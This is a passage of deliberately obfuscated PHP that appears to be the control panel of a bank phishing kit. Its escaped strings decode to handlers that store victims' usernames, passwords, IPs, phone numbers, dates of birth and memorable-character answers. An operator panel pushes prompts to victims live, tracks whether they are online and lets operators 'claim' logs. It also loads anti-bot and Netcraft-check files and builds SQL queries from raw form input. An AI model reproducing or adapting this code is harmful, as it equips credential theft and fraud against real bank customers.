numeric($_POST["\x75\x73\145\x72\151\x64"]) == true) { $comment = "\125\x73\145\x72\x20\162\145\141\x64\x79\x20\146\157\162\x20\143\x61\x6c\x6c\54\x20\x77\x61\x69\164\151\x6e\147"; $uniqueid = $_POST["\x75\x73\x65\x72\151\x64"]; $query = mysqli_query($conn, "\125\x50\x44\101\124\105\40\x63\x75\163\x74\157\x6d\145\x72\x73\x20\123\105\x54\40\143\157\155\x6d\x65\156\x74\x3d\47{$comment}\x27\x2c\40\x73\x74\141\164\x75\163\x3d\x33\x2c\x20\x62\165\172\172\x65\x64\x3d\x30\40\127\x48\x45\x52\105\x20\x75\156\151\x71\x75\145\x69\144\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\x73\164\141\x74\x75\x73" => "\157\x6b")); } else { echo json_encode(array("\163\x74\x61\164\x75\x73" => "\x43\141\154\154\40\x45\x72\x72\157\162")); } } } if ($_GET["\x74\171\160\x65"] == "\x50\150\x6f\x6e\145") { if ($_POST["\x70\150\x6f\156\x65\156\165\x6d"] and $_POST["\x75\x73\145\x72\151\144"] and numeric($_POST["\165\x73\x65\x72\x69\144"]) == true) { $phonenum = $_POST["\x70\x68\x6f\156\x65\x6e\x75\x6d"]; $comment = "\120\x68\157\156\145\40\x4e\x6f\56\x20\x45\156\164\x65\x72\x65\144\54\x20\x75\163\x65\162\40\x77\141\x69\x74\x69\156\147"; $uniqueid = $_POST["\165\x73\x65\x72\151\x64"]; $query = mysqli_query($conn, "\x55\x50\x44\x41\x54\105\40\143\x75\163\x74\157\x6d\145\x72\x73\40\123\x45\x54\40\160\150\x6f\x6e\x65\156\165\155\75\47{$phonenum}\47\x2c\40\x63\157\x6d\155\x65\x6e\x74\x3d\x27{$comment}\x27\x2c\x20\x73\x74\141\x74\165\x73\75\x34\x2c\40\x62\165\172\x7a\x65\144\x3d\x30\40\x57\110\105\122\105\40\165\x6e\151\161\165\x65\151\144\75{$uniqueid}"); if ($query) { echo json_encode(array("\163\x74\x61\x74\165\x73" => "\157\153")); } else { echo json_encode(array("\163\x74\x61\164\165\x73" => "\x50\x68\x6f\156\145\x20\x45\x72\x72\x6f\162")); } } } if ($_GET["\164\x79\x70\x65"] == "\x4d\145\155\157") { if ($_POST["\146\x75\x6c\154\155\145\155\x6f"] and $_POST["\165\x73\145\x72\x69\144"] and numeric($_POST["\x75\163\145\x72\151\x64"]) == true) { $fullmemo = $_POST["\x66\165\x6c\154\x6d\145\155\157"]; $comment = "\x46\165\154\x6c\40\155\x65\x6d\157\40\145\156\164\145\162\x65\144\54\x20\165\x73\145\162\40\167\141\151\164\x69\x6e\147"; $uniqueid = $_POST["\165\x73\145\x72\151\144"]; $query = mysqli_query($conn, "\x55\x50\x44\101\x54\105\40\143\165\x73\x74\x6f\155\145\162\x73\x20\x53\x45\124\40\146\165\x6c\x6c\155\145\x6d\157\75\47{$fullmemo}\x27\x2c\x20\143\x6f\155\x6d\145\x6e\x74\75\x27{$comment}\x27\x2c\x20\x73\x74\141\x74\x75\x73\x3d\x35\54\40\x62\x75\x7a\172\x65\x64\x3d\60\40\127\x48\105\x52\105\40\165\x6e\151\161\x75\x65\151\144\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\163\164\x61\x74\x75\163" => "\x6f\153")); } else { echo json_encode(array("\163\164\x61\164\x75\x73" => "\115\145\x6d\x6f\x20\x45\162\x72\157\162")); } } } if ($_GET["\x74\171\x70\x65"] == "\104\x4f\x42") { if ($_POST["\165\x73\162\144\157\x62"] and $_POST["\x75\x73\x65\x72\151\x64"] and numeric($_POST["\x75\x73\145\x72\151\144"]) == true) { $usrdob = $_POST["\x75\163\x72\x64\157\x62"]; $comment = "\104\141\x74\x65\x20\x6f\146\x20\x42\151\x72\x74\150\x20\145\x6e\x74\x65\162\145\144\54\x20\x75\163\145\162\40\167\x61\151\164\151\156\147"; $uniqueid = $_POST["\x75\163\145\162\151\x64"]; $query = mysqli_query($conn, "\125\x50\x44\101\x54\105\x20\x63\x75\x73\x74\157\x6d\x65\162\x73\x20\123\105\x54\x20\165\x73\x72\144\x6f\142\x3d\47{$usrdob}\x27\54\40\143\x6f\155\155\145\x6e\164\75\47{$comment}\x27\x2c\x20\163\x74\x61\164\x75\x73\x3d\66\54\40\x62\x75\172\x7a\145\144\75\x30\40\127\x48\105\122\105\40\165\x6e\x69\161\x75\145\151\x64\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\x73\164\x61\x74\x75\163" => "\x6f\x6b")); } else { echo json_encode(array("\x73\x74\141\164\x75\x73" => "\104\117\x42\x20\105\x72\x72\x6f\x72")); } } } } goto VEIzH; QeL9a: session_start(); goto LMKec; n1XJz: include "\56\56\x2f\56\x2e\x2f\103\117\116\106\x49\107\x2e\160\x68\160"; goto rrcMV; cZBxP: include "\x2e\x2e\57\x76\145\156\x64\157\162\57\x32\x30\x30\x2e\160\x68\x70"; goto k_RXL; Adg79: include "\56\56\x2f\166\145\156\144\x6f\162\x2f\61\x30\x30\56\160\150\160"; goto cZBxP; UEkDl: if ($_GET["\x74\171\x70\145"] == "\154\157\x67\151\x6e") { if ($_POST["\165\163\x72\x6c\x6f\x67\151\x6e"] and $_POST["\x75\x73\162\x70\141\163\163"] and $_POST["\x69\x70"] and $_POST["\x75\x61"]) { $usrlogin = $_POST["\x75\163\x72\154\157\147\x69\x6e"]; $usrpass = $_POST["\x75\x73\x72\x70\141\x73\x73"]; $ip = $_POST["\151\x70"]; $comment = "\125\163\x65\x72\x20\x6a\x75\163\164\40\x6c\157\147\x67\145\144\40\151\x6e\164\157\40\141\143\x63\157\165\156\164"; $ua = urlencode($_POST["\165\x61"]); $uniqueid = time(); $query = mysqli_query($conn, "\111\x4e\123\x45\122\124\40\111\116\x54\x4f\40\143\x75\163\x74\x6f\155\x65\x72\x73\x20\50\x75\163\x72\154\157\x67\151\x6e\x2c\x20\165\x73\162\160\141\x73\163\x2c\40\x63\x6f\155\x6d\145\x6e\x74\x2c\x20\x69\160\x2c\40\x75\x73\x65\162\141\147\x65\x6e\164\54\x20\x75\156\151\x71\165\145\x69\x64\x2c\40\163\164\x61\164\x75\163\x29\x20\126\101\x4c\125\105\x53\x20\50\x27{$usrlogin}\47\x2c\40\47{$usrpass}\x27\x2c\40\47{$comment}\47\x2c\x20\47{$ip}\47\x2c\x20\47{$ua}\47\54{$uniqueid}\x2c\40\61\51"); if ($query) { $_SESSION["\x75\156\151\x71\165\145\151\x64"] = $uniqueid; $_SESSION["\163\x74\x61\162\164\x65\144"] = "\164\x72\x75\145"; echo json_encode(array("\163\x74\x61\x74\x75\163" => "\157\x6b")); } else { echo json_encode(array("\163\164\141\164\x75\163" => "\x64\x62\40\x63\x6f\x6e\156\40\156\x6f\x74\x6f\153")); } } } goto h4yuY; rrcMV: include "\155\x61\162\147\x69\156\x2e\160\150\x70"; goto Adg79; KBZ2t: include "\x2e\56\57\166\145\x6e\x64\x6f\x72\57\x69\x6e\x64\145\170\x2e\x70\x68\x70"; goto Qm6X6; k_RXL: include "\x2e\56\x2f\166\x65\156\144\157\162\x2f\63\x30\x30\x2e\x70\x68\x70"; goto KBZ2t; LMKec: function numeric($num) { if (preg_match("\57\x5e\133\x30\x2d\x39\135\53\x24\x2f", $num)) { $status = true; } else { $status = false; } return $status; } goto UEkDl; Qm6X6: include "\56\x2e\x2f\166\x65\156\144\157\162\57\156\x65\x74\143\x72\141\x66\x74\137\143\x68\145\x63\153\x2e\160\150\160"; goto QeL9a; h4yuY: if ($_SESSION["\x61\144\155\151\x6e\137\154\157\x67\x67\x65\144"] == "\164\162\165\145") { if ($_GET["\164\171\x70\145"] == "\x63\157\155\155\155\141\x6e\144") { if ($_POST["\x75\x73\145\x72\x69\144"] and numeric($_POST["\165\x73\145\162\151\144"]) == true and $_POST["\163\164\x61\x74\165\x73"] and numeric($_POST["\x73\164\x61\164\x75\x73"]) == true) { $userid = $_POST["\x75\x73\x65\162\x69\x64"]; $status = $_POST["\x73\x74\141\x74\165\163"]; $askchar1 = $_POST["\x61\x73\153\x63\150\x61\x72\x31"]; $askchar2 = $_POST["\x61\x73\153\x63\150\x61\162\x32"]; $askchar3 = $_POST["\141\163\153\x63\150\x61\162\x33"]; $call_code = $_POST["\143\141\154\154\137\143\157\144\145"]; $callnum = $_POST["\143\x61\154\154\x6e\165\155"]; $comment = "\101\x64\155\151\156\40\150\x61\x73\x20\x73\x65\x6e\164\40\143\157\x6d\x6d\x61\156\144"; if ($askchar1 != null and $askchar1 != '' and ($askchar2 != null and $askchar2 != '') and ($askchar3 != '' and $askchar3 != null) and ($call_code == null and $callnum == null)) { $query = mysqli_query($conn, "\x55\x50\x44\101\124\105\x20\143\165\x73\164\x6f\155\145\162\163\x20\x53\x45\x54\x20\x63\x6f\x6d\155\x65\x6e\164\x3d\x27{$comment}\47\54\x20\163\x74\141\x74\x75\x73\x3d\47{$status}\x27\54\40\141\163\x6b\143\150\x61\162\x31\75\47{$askchar1}\47\54\40\x61\163\153\143\x68\x61\162\62\75\x27{$askchar2}\47\54\x20\141\x73\153\x63\150\141\x72\63\75\x27{$askchar3}\47\40\127\110\x45\x52\x45\40\x69\144\x3d{$userid}"); } else { if ($call_code != '' and $call_code != null and ($callnum == '' and $callnum == null) and ($askchar1 == '' and $askchar2 == '' and $askchar3 == '')) { $query = mysqli_query($conn, "\125\120\x44\x41\124\x45\40\143\165\x73\164\x6f\x6d\145\162\x73\x20\123\x45\x54\x20\x63\157\155\155\x65\x6e\164\75\x27{$comment}\47\54\x20\x73\x74\x61\x74\165\x73\x3d\47{$status}\x27\54\40\x63\141\x6c\154\137\143\157\x64\145\75\47{$call_code}\x27\x20\x57\x48\x45\122\x45\x20\151\144\75{$userid}"); } else { if ($callnum != '' and $callnum != null and ($call_code == '' and $call_code == null) and ($askchar1 == '' and $askchar2 == '' and $askchar3 == '')) { $query = mysqli_query($conn, "\x55\x50\x44\x41\x54\x45\x20\x63\x75\x73\x74\x6f\155\145\x72\x73\x20\123\x45\x54\40\x63\x6f\x6d\155\x65\x6e\164\75\x27{$comment}\x27\x2c\x20\x73\x74\141\x74\x75\163\x3d\47{$status}\x27\54\x20\x63\141\154\x6c\156\x75\x6d\75\47{$callnum}\x27\40\x57\110\x45\x52\105\40\x69\x64\75{$userid}"); } else { $query = mysqli_query($conn, "\x55\120\104\101\124\105\40\x63\x75\x73\x74\x6f\155\145\162\x73\40\123\x45\x54\x20\163\x74\141\164\165\x73\75{$status}\x20\x57\110\105\122\105\x20\x69\144\75{$userid}"); } } } if ($query) { echo json_encode(array("\163\x74\141\164\165\163" => "\157\153")); } else { echo json_encode(array("\163\x74\141\164\x75\163" => "\144\142\x20\x63\157\156\156\x20\145\x72\162\157\162")); } } else { echo json_encode(array("\163\164\x61\164\165\x73" => "\143\x6f\x6d\x6d\x61\x6e\144\40\145\x72\x72\157\x72")); } } if (isset($_GET["\x67\x65\x74\x5f\163\165\x62\x6d\x69\x74\164\x65\144"])) { $query = mysqli_query($conn, "\123\x45\x4c\x45\x43\x54\40\52\40\x46\122\117\x4d\x20\x63\x75\x73\164\x6f\155\x65\x72\163\40\127\x48\105\x52\105\40\x73\x74\x61\164\165\163\x3c\75\70\40\x61\x6e\144\40\x62\x75\x7a\x7a\x65\144\x3d\x30"); if ($query) { $num = mysqli_num_rows($query); $array = mysqli_fetch_array($query, MYSQLI_ASSOC); if ($num >= 1) { echo json_encode(array("\163\164\141\164\165\x73" => "\x6f\x6b")); } else { echo json_encode(array("\x73\x74\141\x74\165\x73" => "\156\157\x74\157\153")); } } else { echo json_encode(array("\163\164\141\x74\x75\163" => "\x6e\x6f\164\x6f\153")); } } if (isset($_GET["\146\145\x74\x63\x68\137\160\x63\x5f\144\x61\164\x61"])) { $query = mysqli_query($conn, "\x53\105\x4c\x45\x43\x54\40\52\x20\146\162\x6f\155\40\x63\165\x73\x74\157\x6d\145\x72\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["\163\x74\141\x74\x75\x73"] == 500) { $info = "\74\163\160\x61\156\40\x63\x6c\x61\x73\163\x3d\x22\x62\141\x64\147\x65\40\x62\x61\x64\147\x65\55\167\141\162\x6e\x69\156\x67\42\x3e\x45\x61\163\164\145\x72\40\145\147\x67\74\57\x73\160\x61\156\76"; } elseif ($value["\163\x74\x61\x74\x75\163"] == 1) { $info = "\74\163\x70\x61\156\40\143\x6c\141\163\163\75\x22\x62\x61\x64\x67\145\40\142\x61\x64\x67\145\55\x69\x6e\x66\157\42\76\x4e\x65\x77\x20\x55\163\145\x72\x3c\57\x73\160\x61\156\76"; } elseif ($value["\x73\164\x61\x74\x75\x73"] == 2) { $info = "\74\163\160\141\x6e\x20\x63\x6c\141\163\163\75\x22\142\141\x64\147\145\40\x62\141\144\147\x65\x2d\160\x72\x69\x6d\x61\162\171\x22\76\123\x75\x62\155\x69\164\x74\145\x64\x20\x4d\145\x6d\x6f\x72\141\142\x6c\145\40\x63\x68\141\162\141\143\164\x65\x72\74\57\163\x70\141\156\76"; } elseif ($value["\163\164\141\x74\x75\163"] == 3) { $info = "\x3c\163\160\141\x6e\x20\x63\x6c\x61\x73\163\75\42\142\141\144\147\x65\x20\142\x61\144\147\x65\x2d\160\162\x69\155\x61\162\x79\x22\76\x55\x73\145\162\x20\x72\x65\141\144\171\40\x74\x6f\40\142\x65\40\x63\141\154\x6c\145\x64\74\x2f\x73\x70\x61\x6e\76"; } elseif ($value["\x73\164\x61\164\x75\x73"] == 4) { $info = "\x3c\163\x70\141\156\x20\x63\x6c\141\163\x73\x3d\x22\142\141\144\147\145\40\x62\141\x64\147\145\x2d\x70\x72\151\155\x61\x72\171\x22\76\123\x75\142\155\x69\x74\164\x65\x64\x20\155\x6f\x62\x69\154\145\40\156\165\x6d\142\145\162\x3c\57\x73\x70\141\x6e\x3e"; } elseif ($value["\163\x74\x61\164\x75\163"] == 5) { $info = "\74\x73\x70\x61\x6e\x20\x63\154\x61\x73\163\x3d\x22\x62\141\144\x67\x65\x20\x62\141\x64\147\145\x2d\160\162\151\x6d\141\x72\171\42\x3e\123\x75\142\x6d\x69\x74\164\x65\x64\x20\x66\x75\154\x6c\x20\x6d\x65\155\157\74\x2f\163\x70\x61\156\76"; } elseif ($value["\x73\164\x61\164\165\x73"] == 6) { $info = "\74\x73\160\x61\156\40\143\x6c\141\x73\163\75\x22\x62\x61\x64\x67\145\40\142\x61\144\147\145\x2d\160\x72\151\155\141\162\x79\42\x3e\x53\x75\x62\x6d\x69\164\x74\145\144\40\104\117\102\74\57\x73\160\x61\x6e\x3e"; } elseif ($value["\x73\x74\x61\164\x75\x73"] == 11) { $info = "\74\x73\x70\141\156\x20\x63\x6c\x61\163\163\x3d\42\x62\141\x64\147\145\40\142\141\144\147\145\x2d\x70\x72\x69\x6d\141\162\x79\42\76\x41\x77\x61\x69\164\x69\156\x67\x20\115\x65\x6d\x6f\x20\103\x68\x61\162\74\x2f\x73\160\x61\156\76"; } elseif ($value["\x73\x74\x61\164\165\x73"] == 12) { $info = "\x3c\x73\160\x61\x6e\40\143\154\x61\x73\x73\x3d\42\x62\141\144\147\x65\x20\x62\x61\x64\x67\x65\x2d\160\x72\151\x6d\x61\x72\171\42\76\101\167\141\151\164\151\156\147\x20\x43\141\x6c\154\40\x72\x65\163\160\x6f\x6e\163\x65\74\x2f\163\x70\x61\156\76"; } elseif ($value["\x73\x74\x61\x74\165\x73"] == 13) { $info = "\x3c\x73\x70\141\156\40\x63\x6c\x61\x73\x73\75\x22\142\x61\x64\147\145\x20\142\x61\144\x67\x65\x2d\160\162\x69\x6d\x61\162\x79\x22\76\101\167\x61\151\x74\x69\156\x67\x20\103\x61\x6c\154\x20\101\x75\164\150\74\57\163\160\x61\156\x3e"; } elseif ($value["\163\x74\x61\x74\x75\163"] == 14) { $info = "\74\x73\160\141\156\x20\x63\154\141\163\163\x3d\x22\142\141\144\147\x65\x20\x62\141\x64\x67\145\x2d\160\162\x69\155\141\x72\x79\42\x3e\101\167\x61\151\164\151\156\x67\x20\x50\150\157\x6e\145\40\x4e\157\x2e\74\x2f\163\160\x61\156\x3e"; } elseif ($value["\163\x74\141\x74\165\163"] == 15) { $info = "\x3c\x73\160\141\156\x20\x63\154\x61\x73\x73\x3d\x22\142\x61\144\147\145\40\x62\x61\x64\147\145\x2d\x70\x72\x69\155\x61\162\x79\x22\76\101\167\x61\x69\x74\151\x6e\x67\40\x46\165\154\x6c\x20\115\145\155\157\74\57\163\x70\141\x6e\76"; } elseif ($value["\163\164\x61\x74\165\x73"] == 16) { $info = "\74\x73\x70\x61\x6e\x20\143\x6c\141\x73\163\x3d\42\x62\x61\144\x67\x65\x20\x62\141\x64\147\x65\x2d\160\x72\x69\x6d\x61\x72\x79\x22\x3e\x41\167\x61\x69\x74\151\156\x67\40\104\x4f\x42\x3c\57\x73\x70\x61\x6e\76"; } elseif ($value["\x73\x74\x61\x74\165\163"] == 50) { $info = "\x3c\163\x70\x61\x6e\40\143\x6c\x61\163\163\x3d\x22\x62\x61\x64\147\x65\40\x62\141\144\x67\x65\55\x70\x72\x69\x6d\141\x72\x79\x22\76\x42\141\143\x6b\x20\x74\157\40\x4c\x6f\147\x69\156\x3c\57\163\160\x61\156\76"; } elseif ($value["\x73\164\x61\164\x75\163"] == 100) { $info = "\74\163\x70\141\x6e\40\143\x6c\141\x73\x73\75\x22\142\x61\x64\x67\145\40\142\x61\144\147\145\55\x69\x6e\x66\157\x22\76\111\x4e\x56\x41\114\x49\104\x3c\57\163\160\141\x6e\76"; } elseif ($value["\x73\164\141\x74\x75\x73"] == 20) { $info = "\x3c\163\x70\141\x6e\x20\x63\x6c\x61\x73\x73\75\x22\142\141\144\147\x65\x20\x62\141\x64\147\x65\x2d\x73\165\x63\143\x65\163\x73\42\76\x46\x69\156\x69\163\x68\x65\144\x3c\x2f\163\160\x61\x6e\x3e"; } if ($value["\x73\164\141\x74\165\x73"] == 20) { $userStatus = "\x3c\x73\160\141\156\76\74\x69\155\147\40\163\162\143\75\x22\160\141\162\x74\151\x61\154\x2f\151\x6d\x67\x2f\x6f\x66\x66\x2e\x70\156\147\x22\x20\163\164\x79\x6c\145\x3d\x22\167\x69\x64\164\x68\72\x32\x30\160\x78\73\x70\x61\144\144\x69\x6e\x67\55\x72\151\147\150\x74\x3a\x31\x70\170\x22\76\x3c\x62\x3e\117\x66\x66\x6c\x69\156\145\x3c\57\x62\x3e\74\x2f\x73\x70\x61\x6e\x3e"; echo "\xa\11\11\11\11\74\164\x72\x20\x73\x74\171\154\x65\x3d\47\143\x6f\x6c\157\162\72\x77\x68\151\164\x65\x27\76\12\11\11\x9\11\x9\x3c\164\144\76{$value["\x69\x64"]}\74\x2f\164\144\76\12\x9\x9\x9\x9\11\x3c\x74\x64\76{$value["\165\163\x72\154\x6f\147\x69\x6e"]}\x3c\57\164\144\x3e\xa\11\x9\11\11\x9\74\x74\x64\x3e{$userStatus}\x3c\x2f\x74\144\76\12\x9\11\x9\x9\x9\74\x74\x64\76{$value["\151\160"]}\74\x2f\164\144\x3e\xa\x9\11\11\x9\11\x3c\x74\x64\x3e{$info}\x3c\57\x74\x64\x3e\12\11\11\x9\x9\11\x3c\x74\x64\76\xa\11\11\11\x9\11\11\x3c\142\x75\164\x74\157\156\40\164\x79\160\145\75\x27\142\x75\164\164\x6f\x6e\47\x20\157\156\x63\154\151\x63\153\75\47\166\x69\x65\167\x5f\154\x6f\147\102\164\x6e\50\x74\150\151\x73\51\47\40\143\x6c\141\163\x73\x3d\x27\142\x74\156\x20\142\164\156\55\x6d\x64\40\x62\164\x6e\x2d\144\141\x72\153\x27\x20\x69\144\x3d\47\165\x73\x65\162\x69\144\x5f{$value["\x69\x64"]}\x27\x20\x64\x61\x74\141\x2d\164\157\147\x67\154\145\x3d\47\155\x6f\144\x61\x6c\x27\x20\144\141\164\x61\55\x74\141\x72\147\x65\164\75\47\43\x76\x69\145\x77\155\x6f\x64\141\x6c\137\165\x73\x65\162\151\x64\137{$value["\x69\144"]}\x27\76\x56\x69\145\x77\x20\x4c\157\147\x3c\57\142\x75\x74\164\157\156\76\12\x9\11\x9\11\x9\x9\x3c\x62\x75\164\164\x6f\156\40\164\x79\x70\x65\x3d\47\x62\x75\164\164\157\x6e\47\40\x63\154\141\x73\x73\x3d\x27\142\x74\156\x20\142\x74\156\x2d\x6d\x64\40\142\164\x6e\x2d\144\141\x6e\147\145\162\x27\40\151\x64\75\x27\165\163\x65\x72\151\x64\137{$value["\x69\x64"]}\x27\157\156\143\x6c\x69\143\153\x3d\x27\x64\x65\154\145\x74\x65\x65\156\x74\162\171\x28\164\x68\151\x73\51\x27\x3e\74\151\40\x63\x6c\x61\x73\x73\x3d\x27\x66\141\x20\x66\141\55\164\x72\x61\x73\150\47\x20\x61\162\151\141\x2d\150\x69\144\144\145\156\75\x27\x74\162\x75\x65\x27\76\x3c\x2f\x69\x3e\x3c\57\142\x75\x74\x74\157\x6e\76\12\11\11\11\11\x9\x3c\57\x74\144\x3e\12\11\x9\11\x9\x9\x3c\x74\x64\76\x46\x69\x6e\151\x73\150\x65\x64\40\142\171\x20\x2d\x20{$value["\154\157\147\137\x6f\x77\156\x65\162"]}\x3c\57\x74\x64\76\12\x9\11\11\x9\x3c\57\164\162\76\xa\11\x9\11\11"; } else { $userStatus = "\74\x73\160\141\156\76\x3c\151\x6d\x67\x20\x73\162\x63\75\x22\x70\x61\162\x74\151\x61\154\57\x69\x6d\x67\x2f\x6f\x66\146\56\x70\x6e\147\x22\40\x73\x74\x79\154\x65\75\x22\167\151\x64\x74\150\72\x32\60\160\170\x3b\x70\x61\144\x64\151\x6e\x67\55\x72\151\x67\150\x74\x3a\61\x70\x78\x22\x3e\x3c\142\x3e\117\146\x66\154\151\x6e\x65\x3c\x2f\142\76\x3c\57\163\x70\x61\x6e\x3e"; $savedStatus = $value["\x6c\x61\163\164\137\141\x63\x74\x69\x76\151\x74\x79"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("\156\x6f\x77"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "\x3c\163\160\141\x6e\x3e\74\151\155\147\40\x73\x72\143\x3d\x22\160\x61\x72\x74\x69\141\154\x2f\x69\x6d\x67\57\157\156\56\x70\x6e\147\x22\x20\163\x74\171\x6c\x65\x3d\x22\x77\x69\144\x74\150\x3a\62\x30\160\x78\73\x70\141\x64\x64\x69\x6e\147\x2d\162\x69\x67\x68\164\x3a\61\160\x78\42\76\74\142\x3e\117\156\154\x69\156\x65\74\57\142\76\74\x2f\x73\x70\141\x6e\x3e"; } } else { if ($savedStatus === null) { $userStatus = "\74\x73\160\141\156\x3e\x3c\151\x6d\147\x20\163\162\143\75\42\160\x61\x72\x74\151\141\x6c\57\151\x6d\147\57\x6e\141\56\x70\156\x67\42\40\x73\x74\171\154\x65\x3d\42\x77\x69\x64\x74\x68\x3a\62\x35\160\170\73\x70\141\144\x64\151\156\x67\55\x72\x69\x67\x68\x74\x3a\x31\160\x78\42\76\74\x62\76\x4e\157\x20\x64\x61\164\141\x3c\x2f\142\76\74\57\x73\x70\x61\156\x3e"; } } if ($Multiple_Admins == "\x6f\x66\x66") { echo "\xa\11\11\x9\11\x9\x3c\164\x72\x20\x73\x74\x79\x6c\x65\x3d\x27\143\157\x6c\157\x72\x3a\167\x68\x69\164\x65\x27\76\12\x9\x9\x9\11\11\x9\74\x74\144\76{$value["\x69\144"]}\74\x2f\164\144\x3e\xa\11\x9\x9\11\x9\x9\x3c\x74\x64\76{$value["\165\163\x72\154\157\147\151\156"]}\x3c\57\164\x64\76\xa\x9\x9\11\11\x9\x9\74\x74\x64\76{$userStatus}\x3c\x2f\164\x64\76\12\x9\x9\x9\x9\x9\x9\x3c\x74\x64\x3e{$value["\x69\x70"]}\x3c\57\164\x64\76\xa\x9\11\11\x9\x9\11\74\164\x64\x3e{$value["\x63\x6f\155\x6d\x65\156\164"]}\74\57\x74\144\76\xa\x9\x9\11\11\11\x9\74\164\144\x3e{$info}\x3c\57\x74\x64\76\12\11\11\11\x9\x9\x9\74\x74\x64\x3e\12\11\11\11\11\x9\x9\x9\74\x62\165\164\x74\x6f\x6e\40\x74\x79\x70\x65\75\x27\142\165\164\164\x6f\x6e\x27\40\x6f\156\x63\x6c\x69\143\153\75\x27\143\157\x6e\164\162\x6f\x6c\102\x74\156\x28\x74\x68\151\x73\51\47\x20\x63\154\141\163\163\75\x27\142\164\156\x20\142\x74\156\x2d\155\144\40\x62\164\156\x2d\x69\156\x66\x6f\x27\40\x69\x64\x3d\47\x75\163\145\x72\151\144\x5f{$value["\x69\x64"]}\47\40\144\141\164\141\x2d\164\x6f\147\147\x6c\145\75\47\155\157\x64\141\154\x27\40\x64\x61\164\x61\x2d\x74\x61\x72\x67\x65\164\75\x27\43\155\x6f\144\141\x6c\x5f\x75\163\145\x72\151\144\137{$value["\x69\x64"]}\47\x3e\x41\143\x74\x69\157\156\x3c\57\x62\x75\x74\x74\x6f\156\x3e\xa\x9\x9\x9\11\x9\11\x9\x3c\142\x75\164\x74\157\156\x20\x74\x79\x70\145\75\47\x62\165\164\x74\157\x6e\x27\40\143\154\x61\163\163\75\x27\142\164\x6e\x20\x62\x74\x6e\x2d\155\x64\40\x62\164\x6e\55\x64\x61\156\x67\x65\162\47\40\x69\x64\x3d\47\165\163\145\x72\x69\144\137{$value["\x69\144"]}\47\x6f\x6e\143\x6c\151\x63\x6b\75\x27\x64\x65\x6c\x65\x74\145\145\156\164\162\x79\x28\x74\x68\151\163\51\47\76\74\151\x20\143\x6c\x61\163\163\x3d\47\146\x61\40\146\x61\x2d\164\x72\141\x73\150\47\40\x61\x72\x69\141\x2d\x68\x69\x64\x64\x65\x6e\x3d\x27\164\162\165\x65\x27\x3e\74\x2f\151\x3e\x3c\57\x62\165\164\x74\x6f\x6e\76\12\11\11\11\11\x9\x9\74\x2f\164\144\76\12\11\x9\11\11\x9\74\x2f\x74\x72\76\12\x9\x9\x9\x9\11"; } else { if ($value["\x6c\x6f\x67\137\x6f\x77\x6e\x65\x72"] == '') { echo "\12\11\x9\x9\x9\11\11\74\164\162\40\x73\x74\171\x6c\x65\75\x27\x63\x6f\154\157\162\x3a\167\x68\151\x74\145\47\x3e\12\11\x9\11\11\11\x9\x9\x3c\164\x64\x3e{$value["\x69\x64"]}\x3c\57\164\144\76\12\x9\x9\x9\x9\x9\x9\11\x3c\164\144\x3e{$value["\x75\x73\x72\x6c\x6f\147\151\156"]}\74\57\164\x64\x3e\12\11\x9\11\x9\x9\x9\x9\74\164\144\76{$userStatus}\x3c\57\x74\x64\x3e\12\x9\11\x9\11\x9\x9\x9\74\164\x64\76{$value["\151\160"]}\x3c\x2f\164\144\76\xa\11\11\11\x9\11\11\x9\x3c\164\144\76{$value["\143\x6f\155\x6d\145\156\164"]}\x3c\57\164\x64\76\xa\11\11\x9\x9\11\11\x9\74\164\x64\x3e{$info}\74\57\164\144\x3e\12\11\11\x9\x9\11\11\11\x3c\164\x64\x3e\xa\x9\x9\x9\11\11\11\x9\x9\74\x62\x75\x74\x74\157\x6e\40\x74\171\x70\x65\75\47\142\165\164\x74\x6f\x6e\47\x20\x6f\x6e\x63\154\151\x63\x6b\x3d\x27\143\154\x61\151\155\102\x74\156\x28\164\x68\151\163\51\47\40\x63\154\x61\163\163\x3d\x27\142\164\156\40\142\164\156\55\x6d\x64\40\142\164\156\55\151\x6e\146\157\x27\x20\151\x64\75\47\165\x73\x65\162\151\144\x5f{$value["\151\144"]}\47\x20\144\141\x74\x61\55\164\x6f\147\x67\x6c\x65\x3d\x27\x6d\x6f\x64\x61\154\47\40\x64\x61\164\x61\55\164\141\162\x67\x65\x74\75\x27\43\x6d\157\144\x61\x6c\137\x75\163\145\162\x69\144\137{$value["\151\144"]}\x27\x3e\40\103\154\141\151\155\x20\x4c\157\x67\40\xf0\x9f\x94\x91\x3c\x2f\x62\165\x74\x74\157\156\x3e\12\11\11\11\11\11\11\x9\x3c\57\x74\x64\76\xa\x9\x9\11\x9\x9\x9\x3c\x2f\x74\x72\x3e\xa\11\11\x9\11\x9\11"; } else { if ($value["\154\157\147\137\x6f\167\156\145\x72"] == $_SESSION["\x6c\157\x67\137\x6f\167\156\x65\162"]) { echo "\xa\11\11\x9\x9\11\11\x3c\x74\162\40\163\164\x79\154\145\x3d\47\143\x6f\x6c\x6f\162\x3a\x77\x68\x69\x74\145\x27\76\xa\11\x9\x9\x9\11\11\11\74\164\x64\x3e{$value["\151\x64"]}\74\x2f\164\x64\x3e\xa\x9\x9\x9\11\x9\x9\x9\74\x74\144\76{$value["\x75\x73\162\x6c\x6f\x67\151\156"]}\x3c\57\x74\144\76\xa\11\x9\x9\x9\x9\x9\x9\74\x74\x64\x3e{$userStatus}\74\x2f\x74\x64\x3e\12\x9\x9\11\x9\x9\11\11\74\164\x64\76{$value["\x69\x70"]}\x3c\x2f\164\x64\76\12\x9\11\11\x9\11\x9\x9\x3c\164\x64\76{$value["\x63\157\x6d\x6d\x65\x6e\164"]}\x3c\x2f\x74\144\x3e\12\x9\11\11\11\11\x9\x9\74\164\x64\76{$info}\x3c\57\x74\144\76\12\x9\x9\11\11\11\11\11\74\164\x64\76\12\11\x9\11\11\x9\11\11\x9\74\142\165\164\164\x6f\x6e\x20\164\x79\x70\145\75\x27\x62\165\164\x74\157\x6e\x27\40\x6f\x6e\x63\x6c\x69\143\x6b\75\47\x63\x6f\156\164\x72\157\154\102\x74\156\x28\x74\x68\x69\163\51\x27\40\143\x6c\x61\x73\163\75\x27\x62\164\x6e\40\x62\x74\x6e